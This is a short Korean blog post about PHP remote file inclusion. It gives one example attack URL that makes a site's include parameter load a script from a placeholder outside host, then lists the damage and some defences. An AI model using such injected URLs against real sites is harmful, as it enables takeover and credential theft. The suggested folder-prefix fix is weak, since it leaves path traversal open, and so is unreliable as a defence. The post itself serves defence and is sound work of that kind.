logo image
메인
기술
HOME
기술

홈페이지 해킹을 줄여보자.

목록
#weblang

해킹방법

  • 본래 URL : http://xxxx.com/index.php?inc=menu/step2.php
  • 해킹시도 URL : http://xxxx.com/index.php?inc=http://yyyy.com/hack.txt

설명

  • GET 인자로 inc가 include하는 페이지를 나타내는 경우
    본래 페이지 대신에 http://yyyy.com/hack.txt 가 include되어서 동작한다.

피해

  • hack.txt가 악의적으로 만들어진 스크립트를 포함할 경우 그 스크립트가 웹상에서 실행되어 핵커는 홈페이지를 마음대로 제어하게 된다.
  • 핵커는 홈페이지에 사용된 변수 속에서 계정 아이디,비밀번호 또는 DB 아이디, 비밀번호를 알아낼 수 있을 것이다.

대책

  • 위 방법은 PHP 4.3.x 이상으로 PHP를 업그레이드 하면 대부분 막을 수 있다.
  • GET 인자로 include하는 페이지의 url을 받아오지 않는다.
    꼭 받아야할 경우 지정된 폴더를 뺀 url을 받고 PHP안에서 그 url을 포함시켜서 처리한다.
    • ex>
      ?inc=step2.php
      PHP안에서는
      $inc = 'menu2/'.$_GET['inc'];
      처럼 처리
  • 카운터에서 의심스런 접근이 없는지 확인한다.
    카운터의 DB에서 접근 페이지를 %?%http://% 처럼 검색해보기 바란다.

P.S

  • 카운터 뒤지던 중 하도 저런 접근이 많아서(약 80 회) 한번 적어봅니다.
  • 언제나 "공대여자는 이쁘다"는 마음가짐을 가지세요.
목록
댓글
  • / /
  • No Nickname
    No Comment
  • 권한이 없습니다.
    {{m_row.m_nick}}
    -
목록형 📅 달력형
제목
[기본형] HTML (with 부트스트랩5.3 , jquery 3.7, vue.js)
유용한 리눅스(LINUX) 명령어
[공지] 기술 게시판
마우스 등의 입력장치의 폴링레이트 이슈 PC/Mobile
new
#폴링레이트 #지연시간 #마우스 #팬
윈도우에서 포트포워딩 하기
#포트포워딩
git hub 소스에서 cors 회피하기
#github
웹 폰트 사용시 load, ready 시점 주의
#font
js-templater 단순한 JS 템플릿 엔진 만들봤는데...
1
#template
웹 페이지에서 선택된 문자열의 너비 알아오기
#text #range #width
HTML에서 자식요소를 격리 시키기 contain: strict;
2
#contain #isolate
contenteditable="plaintext-only"
#contenteditable
openweathermap.org 날씨정보 API
2
#api #날씨
css grid repeat 사용법. (동적 컬럼)
#grid #auto-fit #auto-fill
pointerrawupdate event
1
#pointer
scroll-snap 사용시 주의 사항
#scroll-snap
현재 폴더 기준 이미지 파일의 너비 높이 알아오기
#php #image
motion. A modern animation library for JavaScript, React and Vue
1
#animation #motion
canvas에서 문자열 측정값. baseline 기준 하단 상단 높이 측정. fontBoundingBoxAscent, fontBoundingBoxDescent
1
#canvas #measuretext
tag